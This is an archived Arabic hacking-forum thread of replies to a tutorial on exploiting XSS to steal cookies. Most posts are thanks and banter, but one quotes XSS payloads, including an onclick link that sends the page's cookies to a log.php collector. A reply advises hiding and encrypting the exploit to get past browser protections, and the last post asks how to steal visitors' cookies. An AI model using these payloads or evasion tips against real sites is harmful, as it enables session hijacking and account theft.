:: vBspiders Professional Network :: - [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- حقن xss - ssi (http://www.vbspiders.com/vb/f427.html)

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

اقتباس:

المشاركة الأصلية كتبت بواسطة Cyber Code (المشاركة 388412)

good job :)
keep up

:bleh:

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

يعطيك الف الف عافيه يا غالي.........

اقتباس:

المشاركة الأصلية كتبت بواسطة mass1993 (المشاركة 388280)

يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:

'"--></style></script>***************("Www.VBspiders.com")</script>

وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:

\'\"

ولكن لما كتبت الامر هذا :

كود:

'"--></style></script>***************(4444444)</script>

وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:

"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>

ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

اممممممممم
هاد السر بهاي الثغره والي محتكرها المحترفين ......!!
بتعرف شغله

انت لازم تضع الاستغلال بداخل صفحه
html
وتشفر الاستغلال
وبعد تشفر صفحه
html
;)
اعملك شويه بحث وصدقني رح تزبط معاك

السبب بانه ما زبط معاك هو المتصفحات الحديثه بتعمل شويه حمايه لها من هاي الثغره
لكن التشفير ما عليه حمايه ......

مشكور يا نوووووور كثير ع تعبك وشرحك
وفقت حبيبي

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

يعطيك العافيه حبيبي فولكانو

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

الشرح جميل جدا وممتاز على الي يعانو من هذه الثغرة

والله الاخ ما قصر في شرحها واصل حبيبي

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

اقتباس:

المشاركة الأصلية كتبت بواسطة اجتياح الجراد (المشاركة 388429)

الشرح جميل جدا وممتاز على الي يعانو من هذه الثغرة

والله الاخ ما قصر في شرحها واصل حبيبي

انا كمان كنت مابعرف كيف استغلها :nosweat:
بارك الله فيك منور الموضوع ..~

:2:

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

تسـلم كثير حبيبي .,,
شرحك واضح + جميل !
cry
هههههه

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

اقتباس:

المشاركة الأصلية كتبت بواسطة Doom[Ps] (المشاركة 388436)

تسـلم كثير حبيبي .,,
شرحك واضح + جميل !
cry
هههههه

هلا حبيبي دووم كيف اخبارك ؟
بعرفها مليح بلا .. ~
ههه
الضاهر الكلمه عجبتك :sad_1:

cry

منور الموضوع

:sad_1:

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

شرح جميل ومنسق .. يعطيك العافية يابطل واصـــــــل ^_^

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

اقتباس:

المشاركة الأصلية كتبت بواسطة double-zero (المشاركة 388481)

شرح جميل ومنسق .. يعطيك العافية يابطل واصـــــــل ^_^

بارك الله فيك :3:

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

باراك الله فيك نور موضوع قوي

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

اقتباس:

المشاركة الأصلية كتبت بواسطة Spartacus (المشاركة 388515)

باراك الله فيك نور موضوع قوي

هلا حبيبي نسيموا !
منور الموضوع زي مصباح 1000 وات

1000W

:shutup:

رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~

شو هالحلاوة هاي ولك !

جو اون مان :)

رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~

اقتباس:

المشاركة الأصلية كتبت بواسطة Jaguar.PS (المشاركة 389440)

شو هالحلاوة هاي ولك !

جو اون مان :)

:sad_1:

thx

:2:

رد: [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~

بارك الله فبك بس انا عندي استفسار بسيط

هل يمكن ان نرفع ملف علي موفع معين ويكون هذا الملف مصاب بثغره xss
ونقوم نحن باستغلال هذا الملف ,ولا لازم يكون الموقع ذات نفسه يكون مصاب بثغره xss
علشان نسرف الكوكيز

وهل سرقه الكوكيز للاعضاء المسجلين في الموقع ققط ولا لكل من يدخل علي الموقع من الزوار

انا اسف اطلت عليك ولكن اردت ان تكتمل الصوره في مخيلتي